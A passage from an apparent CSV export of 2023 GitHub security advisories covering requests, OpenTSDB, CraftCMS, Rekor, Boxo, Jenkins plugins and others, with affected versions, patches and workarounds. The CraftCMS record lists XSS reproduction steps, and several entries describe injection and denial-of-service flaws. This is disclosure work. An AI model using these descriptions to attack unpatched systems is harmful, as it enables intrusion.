Requests is the `Proxy-Authorization` header is also handled by urllib3 with our usage of the ProxyManager in adapters.py with [`proxy_manager_for`](https://github.com/psf/requests/blob/f2629e9e3c7ce3c3c8c025bcd8db551101cbc773/requests/adapters.py#L199-L235). This will compute the required proxy headers in `proxy_headers` and pass them to the Proxy Manager, avoiding attaching them directly to the Request object. This will be our preferred option going forward for default usage. ### Patches Starting in Requests v2.31.0, Requests will no longer attach this header to redirects with an HTTPS destination. This should have no negative impacts on the default behavior of the library as the proxy credentials are already properly being handled by urllib3's ProxyManager. For users with custom adapters, this _may_ be potentially breaking if you were already working around this behavior. The previous functionality of `rebuild_proxies` doesn't make sense in any case, so we would encourage any users impacted to migrate any handling of Proxy-Authorization directly into their custom adapter. ### Workarounds For users who are not able to update Requests immediately, there is one potential workaround. You may disable redirects by setting `allow_redirects` to `False` on all calls through Requests top-level APIs. Note that if you're currently relying on redirect behaviors, you will need to capture the 3xx response codes and ensure a new request is made to the redirect destination. ``` import requests r = requests.get('http://github.com/', allow_redirects=False) ``` ### Credits This vulnerability was discovered and disclosed by the following individuals. Dennis Brinkrolf, Haxolot (https://haxolot.com/) Tobias Funke, (tobiasfunke93@gmail.com)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'requests'}, 'ecosystem_specific': {'affected_functions': ['requests.sessions.SessionRedirectMixin.rebuild_proxies']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.31.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/psf/requests/security/advisories/GHSA-j8r2-6x86-q33q'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32681'}, {'type': 'WEB', 'url': 'https://github.com/psf/requests/commit/74ea7cf7a6a27a4eeb2ae24e162bcc942a6706d5'}, {'type': 'PACKAGE', 'url': 'https://github.com/psf/requests'}, {'type': 'WEB', 'url': 'https://github.com/psf/requests/releases/tag/v2.31.0'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/requests/PYSEC-2023-74.yaml'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/06/msg00018.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AW7HNFGYP44RT3DUDQXG2QT3OEV2PJ7Y/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KOYASTZDGQG2BWLSNBPL3TQRL2G7QYNZ/'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202309-08'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-22T20:36:32Z', 'nvd_published_at': None}" 1.4.0,GHSA-63c6-w556-3h7q,2023-06-05T21:09:47Z,2023-05-24T12:30:17Z,,['CVE-2023-2862'],SSCMS vulnerable to Cross Site Scripting,"A vulnerability, which was classified as problematic, was found in SiteServer CMS up to 7.2.1. Affected is an unknown function of the file `/api/stl/actions/search`. The manipulation of the argument ajaxDivId leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. VDB-229818 is the identifier assigned to this vulnerability.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'SSCMS'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '7.2.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2862'}, {'type': 'PACKAGE', 'url': 'https://gitee.com/siteserver/cms'}, {'type': 'WEB', 'url': 'https://gitee.com/siteserver/cms/issues/I71WJ4'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.229818'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.229818'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-24T17:33:51Z', 'nvd_published_at': None}" 1.4.0,GHSA-4m7v-wr6v-2mw5,2023-05-11T21:00:20Z,2023-05-05T03:30:22Z,,['CVE-2023-2531'],AzuraCast missing brute force prevention,"The request rate limiting feature on the login page of AzuraCast before version 0.18.3 can be bypassed, which could allow an attacker to brute force login credentials.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'azuracast/azuracast'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.18.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2531'}, {'type': 'WEB', 'url': 'https://github.com/azuracast/azuracast/commit/bdb23594ad3e0c47c8568ce028a7c244a406cf9d'}, {'type': 'PACKAGE', 'url': 'https://github.com/azuracast/azuracast'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/20463eb2-0f9d-4ea3-a2c8-93f80e7aca02'}]","{'cwe_ids': ['CWE-307'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-05-05T22:33:46Z', 'nvd_published_at': None}" 1.4.0,GHSA-jjgp-whrp-gq8m,2023-05-11T20:48:15Z,2023-05-11T20:48:15Z,,[],in-toto: PGP trust model not (fully) considered,"### Impact This security advisory lists multiple concerns about how in-toto uses PGP keys. The findings are aggregated here, because they are all eligible to the same mitigation strategy. Note that the findings are rated with different severities (see inline) and the highest score was chosen for this advisory: - **PGP Key Creation Time Not Validated** (severity: low) in-toto does not check, if the validity period of a PGP Key (starting with the key creation time) is in the future, when copying the key from GnuPG to a layout, or when verifying signatures. A validity period in the future is usually a sign of a wrong system clock, meaning it can’t be trusted for verifying the validity period. A MITM attacker who is able to manipulate delivered software products might also be able to control the system time by manipulating NTP. In a scenario where an attacker gained control over two expired subkeys with no overlapping validity period, the attacker could set the system time to a time before the validity period of either key, resulting in both keys being accepted. - **PGP Key Revocation Not Considered** (severity: medium) in-toto does not check PGP revocation signatures, when copying the key from GnuPG to a layout, or when verifying signatures. This means that a key may still be accepted in signatures, even if it has been revoked in GnuPG. - **PGP Key Usage Flags Not Considered** (severity: low) in-toto does not check PGP usage flags, when copying the key from GnuPG to a layout, or when verifying signatures. This means that at a key may still be accepted in signatures, even if it is not permitted to sign data as per its key usage flags. Security auditors recommend to verify these properties at signature verification time. However, this is not planned, as in-toto does not rely on PGP’s trust model, because it should not be required to consult with a separate PKI/web-of-trust at verification time. Instead the project owner establishes ultimate trust by adding a PGP public key to a layout, and thus is responsible for its validity, and also to revoke the layout, if the key is no longer trusted. The same is true for PGP public keys used to verify a layout. The preferred mitigation strategy is to verify these properties when exporting a public key from GnuPG, and to clarify usage documentation that no verification against the PGP trust model is performed afterwards. ### References - ""Handle GPG revocation signatures"" -- https://github.com/secure-systems-lab/securesystemslib/issues/190 - ""inconsistent use of GnuPG"" -- https://github.com/in-toto/in-toto/issues/569 ",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'in-toto'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.4.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/in-toto/in-toto/security/advisories/GHSA-jjgp-whrp-gq8m'}, {'type': 'WEB', 'url': 'https://github.com/in-toto/in-toto/issues/569'}, {'type': 'WEB', 'url': 'https://github.com/secure-systems-lab/securesystemslib/issues/190'}, {'type': 'PACKAGE', 'url': 'https://github.com/in-toto/in-toto'}]","{'cwe_ids': ['CWE-295'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-11T20:48:15Z', 'nvd_published_at': None}" 1.4.0,GHSA-h475-7v3c-26q7,2023-05-11T14:06:29Z,2023-05-03T21:30:18Z,,['CVE-2023-25826'],Command injection in OpenTSDB,"Due to insufficient validation of parameters passed to the legacy HTTP query API, it is possible to inject crafted OS commands into multiple parameters and execute malicious code on the OpenTSDB host system. This exploit exists due to an incomplete fix that was made when this vulnerability was previously disclosed as CVE-2020-35476. Regex validation that was implemented to restrict allowed input to the query API does not work as intended, allowing crafted commands to bypass validation. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'net.opentsdb:opentsdb'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.4.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25826'}, {'type': 'WEB', 'url': 'https://github.com/OpenTSDB/opentsdb/pull/2275'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenTSDB/opentsdb'}, {'type': 'WEB', 'url': 'https://www.synopsys.com/blogs/software-security/opentsdb/'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/174570/OpenTSDB-2.4.1-Unauthenticated-Command-Injection.html'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-05-05T02:23:59Z', 'nvd_published_at': None}" 1.4.0,GHSA-rc44-5cmh-879m,2023-05-25T17:02:56Z,2023-05-25T15:30:17Z,,['CVE-2023-2798'],Unrestricted recursion in htmlunit,"Those using HtmlUnit to browse untrusted webpages may be vulnerable to Denial of service attacks (DoS). If HtmlUnit is running on user supplied web pages, an attacker may supply content that causes HtmlUnit to crash by a stack overflow. This effect may support a denial of service attack. This issue affects HtmlUnit before 2.70.0. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.htmlunit:htmlunit'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.70.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2798'}, {'type': 'WEB', 'url': 'https://github.com/HtmlUnit/htmlunit/commit/940dc7fd'}, {'type': 'WEB', 'url': 'https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=54613'}, {'type': 'PACKAGE', 'url': 'https://github.com/HtmlUnit/htmlunit'}, {'type': 'WEB', 'url': 'https://github.com/HtmlUnit/htmlunit/releases/tag/2.70.0'}]","{'cwe_ids': ['CWE-400', 'CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-25T17:02:56Z', 'nvd_published_at': None}" 1.4.0,GHSA-ghpm-mgf5-cv8q,2023-05-17T03:34:02Z,2023-05-16T18:30:16Z,,['CVE-2023-32995'],Jenkins SAML Single Sign On(SSO) Plugin Cross-Site Request Forgery vulnerability,"Jenkins SAML Single Sign On(SSO) Plugin 2.0.0 and earlier does not perform a permission check in an HTTP endpoint. This allows attackers with Overall/Read permission to send an HTTP POST request with JSON body containing attacker-specified content, to miniOrange’s API for sending emails. Additionally, this HTTP endpoint does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability. SAML Single Sign On(SSO) Plugin 2.0.1 removes the affected HTTP endpoint.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.jenkins.plugins:miniorange-saml-sp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32995'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-05-16/#SECURITY-2994'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-17T03:34:02Z', 'nvd_published_at': None}" 1.4.0,GHSA-2h5h-59f5-c5x9,2023-05-09T16:40:11Z,2023-05-03T21:56:23Z,,['CVE-2023-30551'],Rekor's compressed archives can result in OOM conditions,"## Summary Two vulnerabilities have been found in Rekor types for archive files JARs and APKs, where Rekor would crash due to out of memory conditions caused by reading archive metadata files into memory without checking their sizes first causing a Denial of Service of Rekor. These vulnerabilities were found through fuzzing with [OSS-Fuzz](https://google.github.io/oss-fuzz/). ## Vulnerability 1: OOM due to large files in META-INF directory of JAR files. ### Summary Verification of a JAR file submitted to Rekor can cause an out of memory crash if files within the META-INF directory of the JAR are sufficiently large. ### Details As part of verifying a JAR file, Rekor uses the [relic library](http://github.com/sassoftware/relic) to check that the JAR is signed, the signature verifies, and that the hashes in the signed manifest are all valid. This library function reads files within META-INF/ into memory without checking their sizes, resulting in an OOM if the uncompressed file is sufficiently large. Rekor is also not performing any such checks prior to passing the JAR to this library function. ### Patches Users should update to the latest version of Rekor, 1.1.1. ### Workaround There are no workarounds, users should update. ## Vulnerability 2: OOM due to large .SIGN and .PKGINFO files in APK files. ### Summary Parsing of an APK file submitted to Rekor can cause an out of memory crash if the .SIGN or .PKGINFO files within the APK are sufficiently large. ### Details When parsing an APK file, Rekor allocates byte slices to read both the .SIGN and .PKGINFO files into memory in order to verify the signature and hashes in the APK. These byte slices are allocated based on the size included in the tar header for each file, with no checks performed on that size. If the size in the header is sufficiently large, either because the uncompressed file is large or the size in the header has been artificially set to a large value, Rekor will crash due to an out of memory panic. ### Patches Users should update to the latest version of Rekor, 1.1.1. ### Workaround There are no workarounds, users should update.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/sigstore/rekor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/sigstore/rekor/security/advisories/GHSA-2h5h-59f5-c5x9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30551'}, {'type': 'WEB', 'url': 'https://github.com/sigstore/rekor/commit/cf42ace82667025fe128f7a50cf6b4cdff51cc48'}, {'type': 'PACKAGE', 'url': 'https://github.com/sigstore/rekor'}, {'type': 'WEB', 'url': 'https://github.com/sigstore/rekor/releases/tag/v1.1.1'}]","{'cwe_ids': ['CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-03T21:56:23Z', 'nvd_published_at': None}" 1.4.0,GHSA-pqj7-jx24-wj7w,2023-05-11T19:40:49Z,2023-05-11T19:40:49Z,,['CVE-2023-29195'],VTAdmin users that can create shards can deny access to other functions,"### Impact Users can either intentionally or inadvertently create a shard containing `/` characters from VTAdmin such that from that point on, anyone who tries to create a new shard from VTAdmin will receive an error. Attempting to view the keyspace(s) will also no longer work. Creating a shard using `vtctldclient` does not have the same problem because the CLI validates the input correctly. ### Patches v16.0.2, corresponding to [0.16.2 on pkg.go.dev](https://pkg.go.dev/vitess.io/vitess@v0.16.2) ### Workarounds - Always use `vtctldclient` to create shards, instead of using VTAdmin - Disable creating shards from VTAdmin using RBAC - Delete the topology record for the offending shard using the client for your topology server. For example, if you created a shard called `a/b` in keyspace `commerce`, and you are running etcd, it can be deleted by doing something like ``` % etcdctl --endpoints ""http://${ETCD_SERVER}"" del /vitess/global/keyspaces/commerce/shards/a/b/Shard ``` ### References https://github.com/vitessio/vitess/issues/12842 Found during a security audit sponsored by the [CNCF](https://cncf.io) and facilitated by [OSTIF](https://ostif.org).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'Go', 'name': 'vitess.io/vitess'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.16.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vitessio/vitess/security/advisories/GHSA-pqj7-jx24-wj7w'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-29195'}, {'type': 'WEB', 'url': 'https://github.com/vitessio/vitess/issues/12842'}, {'type': 'WEB', 'url': 'https://github.com/vitessio/vitess/pull/12843'}, {'type': 'WEB', 'url': 'https://github.com/vitessio/vitess/commit/9dcbd7de3180f47e94f54989fb5c66daea00c920'}, {'type': 'PACKAGE', 'url': 'https://github.com/vitessio/vitess'}, {'type': 'WEB', 'url': 'https://github.com/vitessio/vitess/releases/tag/v16.0.2'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vitess.io/vitess@v0.16.2'}]","{'cwe_ids': ['CWE-20', 'CWE-703'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-11T19:40:49Z', 'nvd_published_at': None}" 1.4.0,GHSA-r3fg-3r88-6x3f,2023-05-11T20:12:31Z,2023-05-10T21:25:28Z,,[],Ibexa User Settings are accessible on the front-end for anonymous user,"### Impact This security advisory is about the user settings, which include things like preferred time zone and number of items per page in item listings. These could be accessed by the anonymous user. This impacted only the anonymous users themselves, and had no impact on logged in users. As such the impact is limited, even if custom user settings have been added, but please consider if this matters for your site. The fix ensures that only logged in users can access their user settings. ### References https://developers.ibexa.co/security-advisories/ibexa-sa-2023-002-user-settings-are-accessible-on-the-front-end-for-the-anonymous-user ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'ibexa/user'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.4.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ibexa/user/security/advisories/GHSA-r3fg-3r88-6x3f'}, {'type': 'WEB', 'url': 'https://github.com/ibexa/user/commit/77d1a0926d93ca85aa6faeea66bee55e0e067551'}, {'type': 'WEB', 'url': 'https://developers.ibexa.co/security-advisories/ibexa-sa-2023-002-user-settings-are-accessible-on-the-front-end-for-the-anonymous-user'}, {'type': 'PACKAGE', 'url': 'https://github.com/ibexa/user'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-10T21:25:28Z', 'nvd_published_at': None}" 1.4.0,GHSA-j65r-g7q2-f8v3,2023-05-25T16:57:01Z,2023-05-25T16:57:01Z,,['CVE-2023-2881'],Pimcore customers' list user password hash is disclosed,"### Impact The customer view exposes the hashed password along with other deails. An attacker is then able to enum password of a particular id, likewise we can replace id with other user , for example 1015, password hash can be disclosed which can be further cracked with hashcat ### Patches Update to version 3.3.10 or apply this patch manually https://github.com/pimcore/customer-data-framework/commit/d1d58c10313f080737dc1e71fab3beb12488a1e6.patch ### Workarounds Apply https://github.com/pimcore/customer-data-framework/commit/d1d58c10313f080737dc1e71fab3beb12488a1e6.patch manually. ### References https://huntr.dev/bounties/db6c32f4-742e-4262-8fd5-cefd0f133416/ ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/customer-management-framework-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.10'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pimcore/customer-data-framework/security/advisories/GHSA-j65r-g7q2-f8v3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2881'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/customer-data-framework/commit/d1d58c10313f080737dc1e71fab3beb12488a1e6'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/customer-data-framework'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/db6c32f4-742e-4262-8fd5-cefd0f133416'}]","{'cwe_ids': ['CWE-257', 'CWE-522'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-25T16:57:01Z', 'nvd_published_at': None}" 1.4.0,GHSA-3wxg-w96j-8hq9,2023-05-26T21:50:40Z,2023-05-26T13:54:11Z,,['CVE-2023-33194'],CraftCMS stored XSS in Quick Post widget error message,"### Summary The platform does not filter input and encode output in Quick Post validation error message, which can deliver an XSS payload. ### Details Old CVE fixed the XSS in label HTML but didn’t fix it when clicking save. ### PoC 1. Login at admin 2. Go to setting 3. Create a Section 4. On Entry page, click Edit label 5. Inject the XSS payload into the label and save 6. On the admin dashboard choose new widget -> Quick Post 7. In Quick Post, click save with blank slug; The XSS will be executed ""errors"":{""title"":["" cannot be blank.""],""slug"":[""Slug cannot be blank.""] Fixed in https://github.com/craftcms/cms/commit/9d0cd0bda7c8a830a3373f8c0f06943e519ac888 ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'craftcms/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0-RC1'}, {'fixed': '4.4.6'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'craftcms/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.8.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.8.5'}}]","[{'type': 'WEB', 'url': 'https://github.com/craftcms/cms/security/advisories/GHSA-3wxg-w96j-8hq9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33194'}, {'type': 'WEB', 'url': 'https://github.com/craftcms/cms/commit/9d0cd0bda7c8a830a3373f8c0f06943e519ac888'}, {'type': 'PACKAGE', 'url': 'https://github.com/craftcms/cms'}, {'type': 'WEB', 'url': 'https://github.com/craftcms/cms/releases/tag/4.4.6'}]","{'cwe_ids': ['CWE-79', 'CWE-80'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-05-26T13:54:11Z', 'nvd_published_at': None}" 1.4.0,GHSA-97wp-63wq-hfwh,2023-05-17T03:06:37Z,2023-05-16T18:30:16Z,,['CVE-2023-32983'],Jenkins Ansible Plugin job configuration form does not mask variables,"Jenkins Ansible Plugin allows the specification of extra variables that can be passed to Ansible. These extra variables are commonly used to pass secrets. Ansible Plugin 204.v8191fd551eb_f and earlier stores these extra variables unencrypted in job `config.xml` files on the Jenkins controller as part of its configuration. These extra variables can be viewed by users with Item/Extended Read permission or access to the Jenkins controller file system. Additionally, the job configuration form does not mask these extra variables, increasing the potential for attackers to observe and capture them. Ansible Plugin 205.v4cb_c48657c21 masks extra variables displayed on the configuration form, and stores them encrypted once job configurations are saved again.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '205.v4cb'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32983'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-05-16/#SECURITY-3017'}]","{'cwe_ids': ['CWE-312'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-17T03:06:37Z', 'nvd_published_at': None}" 1.4.0,GHSA-g47h-fgcw-g4ph,2023-06-07T16:00:36Z,2023-05-31T06:30:39Z,,['CVE-2023-26131'],Algernon engine and themes vulnerable to Cross-site Scripting,"All versions of the package github.com/xyproto/algernon/engine; all versions of the package github.com/xyproto/algernon/themes are vulnerable to Cross-site Scripting (XSS) via the `themes.NoPage(filename, theme)` function due to improper user input sanitization. Exploiting this vulnerability is possible when a file/resource is not found. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/xyproto/algernon'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.15.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26131'}, {'type': 'PACKAGE', 'url': 'https://github.com/xyproto/algernon'}, {'type': 'WEB', 'url': 'https://github.com/xyproto/algernon/blob/aab484608651852d02a8a93f40baf53ed93e639a/engine/handlers.go#L512'}, {'type': 'WEB', 'url': 'https://github.com/xyproto/algernon/blob/aab484608651852d02a8a93f40baf53ed93e639a/engine/handlers.go#L514'}, {'type': 'WEB', 'url': 'https://github.com/xyproto/algernon/blob/aab484608651852d02a8a93f40baf53ed93e639a/themes/html.go#L145'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMXYPROTOALGERNONENGINE-3312111'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMXYPROTOALGERNONTHEMES-3312112'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T01:56:53Z', 'nvd_published_at': None}" 1.4.0,GHSA-xq6j-x8pq-g3gr,2023-05-02T19:56:50Z,2023-05-02T15:30:34Z,,['CVE-2023-2479'],appium-desktop OS Command Injection vulnerability,appium-desktop v1.14.1 and prior is vulnerable to OS Command Injection.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'appium-desktop'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.14.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2479'}, {'type': 'WEB', 'url': 'https://github.com/appium/appium-desktop/commit/12a988aa08b9822e97056a09486c9bebb3aad8fe'}, {'type': 'PACKAGE', 'url': 'https://github.com/appium/appium-desktop'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/fbdeec3c-d197-4a68-a547-7f93fb9594b4'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-05-02T19:56:50Z', 'nvd_published_at': None}" 1.4.0,GHSA-m974-xj4j-7qv5,2023-05-11T20:32:18Z,2023-05-11T20:32:18Z,,['CVE-2023-25568'],Boxo bitswap/server: DOS unbounded persistent memory leak,"### Impact An attacker is able allocate arbitrarily many bytes in the Bitswap server by sending many `WANT_BLOCK` and or `WANT_HAVE` requests which are queued in an unbounded queue, with allocations that persist even if the connection is closed. This affects users accepting untrusted connections with the Bitswap server, this also affects users using the old API stubs at `github.com/ipfs/boxo/bitswap` because it transitively uses `github.com/ipfs/boxo/bitswap/server`. We have [renamed go-libipfs to boxo](https://github.com/ipfs/boxo/issues/215); this document uses both terms interchangeably. The version numbers for both are applicable, as they share the same historical timeline. ### Remediation Apply one of: - Update `boxo` to [`v0.6.0`](https://github.com/ipfs/boxo/releases/tag/v0.6.0) or later - Update `boxo` to [`v0.4.1`](https://github.com/ipfs/boxo/releases/tag/v0.4.1) Note that ***`v0.5.0` is NOT safe***, `v0.4.1` is a backport of the `v0.6.0` security fixes on top of `v0.4.0`. ### Mitigations 1. The server now limits how many wantlist entries per peer it knows. The `MaxQueuedWantlistEntriesPerPeer` option allows configuring how many wantlist entries the server remembers; if a peer sends a wantlist bigger than this (including a sum of multiple delta updates) the server will truncate the wantlist to the match the limit. This defaults to `1024` entries per peer. 2. The server now properly clears state about peers when they disconnect. Peer state is more lazily allocated (only when a wantlist is received in the first place) and is properly cleared when the `PeerDisconnected` callback is received. 3. The server now ignores CIDs above some size. Clients were able to send any CID as long as the total protobuf message were bellow the 4MiB limit. This is allowed to allocate lots of memory with very little entries. This can be configured using the `MaxCidSize` option and defaults to `168 bytes`. 4. The server now closes the connection if an inline CID is requested (either as `WANT_*` or `CANCEL`). The attack were more effective if done with CIDs that are present in target's blockstore, this is because this will push longer-lasting jobs on some priority queue. Since inline CID are literal data (instead of hashes of data), everyone always ""has"" any inline CID (since instead of loading the data from disk, it can be extracted from the CID). It makes no sense for anyone to ever ask you about an inline CID since they could also just parse it themselves. Thus, as a defensive measure, we kill the connection with peers that ask about an inline CID. ### Vulnerable symbols - `github.com/ipfs/go-libipfs/bitswap/server/internal/decision.(*Engine).MessageReceived` - `github.com/ipfs/go-libipfs/bitswap/server/internal/decision.(*Engine).NotifyNewBlocks` - `github.com/ipfs/go-libipfs/bitswap/server/internal/decision.(*Engine).findOrCreate` - `github.com/ipfs/go-libipfs/bitswap/server/internal/decision.(*Engine).PeerConnected` ### Patches - https://github.com/ipfs/boxo/commit/9cb5cb54d40b57084d1221ba83b9e6bb3fcc3197 (mitigations 1 and 2) - https://github.com/ipfs/boxo/commit/62cbac40b96f49e39cd7fedc77ee6b56adce4916 (mitigations 3 and 4) - https://github.com/ipfs/boxo/commit/baa748b682fabb21a4c1f7628a8af348d4645974 (tests) ### Workarounds If you are using the stubs at `github.com/ipfs/go-libipfs/bitswap` and not taking advantage of the features provided by the server, refactoring your code to use the new split API will allow you to run in a client-only mode using: 